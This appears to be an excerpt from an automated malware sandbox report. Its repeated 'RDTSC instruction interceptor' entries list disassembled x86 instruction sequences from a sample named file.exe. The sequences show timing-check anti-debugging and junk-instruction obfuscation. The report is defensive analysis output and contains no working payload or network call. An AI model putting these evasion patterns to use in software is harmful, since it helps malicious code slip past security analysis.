                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D480F second address: 7D4813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4813 second address: 7D485F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 39430093h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F6C698AAEE8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b clc 0x0000002c call 00007F6C698AAEE9h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 jg 00007F6C698AAEE6h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D485F second address: 7D4871 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F6C6956DA46h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D49C1 second address: 7D49C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4B0F second address: 7D4B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jno 00007F6C6956DA46h 0x0000000b jnc 00007F6C6956DA46h 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jng 00007F6C6956DA4Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4B2F second address: 7D4B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF0h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4C07 second address: 7D4C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4CE6 second address: 7D4CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4CEC second address: 7D4D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub cl, FFFFFF82h 0x00000011 push 00000004h 0x00000013 sbb edx, 27DE793Eh 0x00000019 nop 0x0000001a jnc 00007F6C6956DA58h 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007F6C6956DA46h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AE35 second address: 80AE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF7h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F6C698AAEF4h 0x00000016 jc 00007F6C698AAEE6h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B154 second address: 80B160 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B160 second address: 80B166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B166 second address: 80B16A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B16A second address: 80B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B170 second address: 80B18C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F6C6956DA57h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B18C second address: 80B1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F6C698AAEEDh 0x0000000d jmp 00007F6C698AAEEDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B314 second address: 80B31F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B463 second address: 80B467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B89D second address: 80B8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81151F second address: 811524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101DD second address: 8101E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101E3 second address: 8101ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101ED second address: 8101F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101F1 second address: 810212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6C698AAEEAh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810212 second address: 810216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810785 second address: 810789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810938 second address: 810941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810941 second address: 810945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810945 second address: 810949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810949 second address: 810959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F6C698AAEEEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810BDA second address: 810C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F6C6956DA5Fh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F6C6956DA4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810C09 second address: 810C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F6C698AAEF3h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810C26 second address: 810C30 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6C6956DA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F18 second address: 810F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F21 second address: 810F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F2A second address: 810F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F36 second address: 810F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F3A second address: 810F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6C698AAEF8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EB4D second address: 79EB51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EB51 second address: 79EB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F6C698AAEF9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EB73 second address: 79EBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6C6956DA4Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F6C6956DA4Dh 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F6C6956DA4Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EBA5 second address: 79EBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6C698AAEF4h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EBC2 second address: 79EBCC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EBCC second address: 79EBE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F6C698AAEE6h 0x00000009 jng 00007F6C698AAEE6h 0x0000000f jnp 00007F6C698AAEE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816A0A second address: 816A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F6C6956DA46h 0x0000000d jmp 00007F6C6956DA51h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FA7 second address: 816FB1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FB1 second address: 816FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6C6956DA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FBB second address: 816FC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FC1 second address: 816FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007F6C6956DA4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FD2 second address: 816FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FD9 second address: 816FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817169 second address: 817194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF2h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F6C698AAEF0h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817194 second address: 8171A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6C6956DA46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8171A0 second address: 8171A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8175ED second address: 817605 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6C6956DA46h 0x00000008 je 00007F6C6956DA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F6C6956DA4Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817BD3 second address: 817BE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a ja 00007F6C698AAEE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817BE3 second address: 817BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817BE7 second address: 817C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEEBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jc 00007F6C698AAEE6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817C02 second address: 817C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817C06 second address: 817C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007F6C698AAEE6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817C1A second address: 817C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EEDB second address: 81EEDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79815B second address: 79815F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79815F second address: 79816F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F6C698AAEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E73F second address: 81E744 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EB4F second address: 81EB61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C698AAEEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EB61 second address: 81EB67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820F57 second address: 820F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820F5B second address: 820F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8210C1 second address: 8210C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8275A1 second address: 8275C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA4Dh 0x00000007 jg 00007F6C6956DA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F6C6956DA46h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8275C0 second address: 8275C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794BEC second address: 794BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794BF4 second address: 794BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794BFD second address: 794C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA50h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794C11 second address: 794C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8269FF second address: 826A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6C6956DA46h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826E7D second address: 826E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6C698AAEEFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826E96 second address: 826E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827147 second address: 827153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007F6C698AAEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827153 second address: 82718B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jbe 00007F6C6956DA46h 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F6C6956DA57h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e je 00007F6C6956DA4Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82718B second address: 8271B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jnp 00007F6C698AAEE6h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F6C698AAEE6h 0x0000001a jmp 00007F6C698AAEF0h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8271B5 second address: 8271B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CF82 second address: 82CF99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F6C698AAEECh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CF99 second address: 82CF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CF9F second address: 82CFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEEFh 0x00000009 ja 00007F6C698AAEE6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D140 second address: 82D150 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6C6956DA46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D150 second address: 82D15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6C698AAEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D15A second address: 82D15E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D3D7 second address: 82D3E3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C698AAEEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DDD4 second address: 82DDDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DDDA second address: 82DDFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6C698AAEF8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830FAE second address: 830FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007F6C6956DA46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830FBC second address: 830FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6C698AAEEFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830707 second address: 83070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83070B second address: 83072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F6C698AAEFEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83072F second address: 830757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA53h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6C6956DA4Fh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
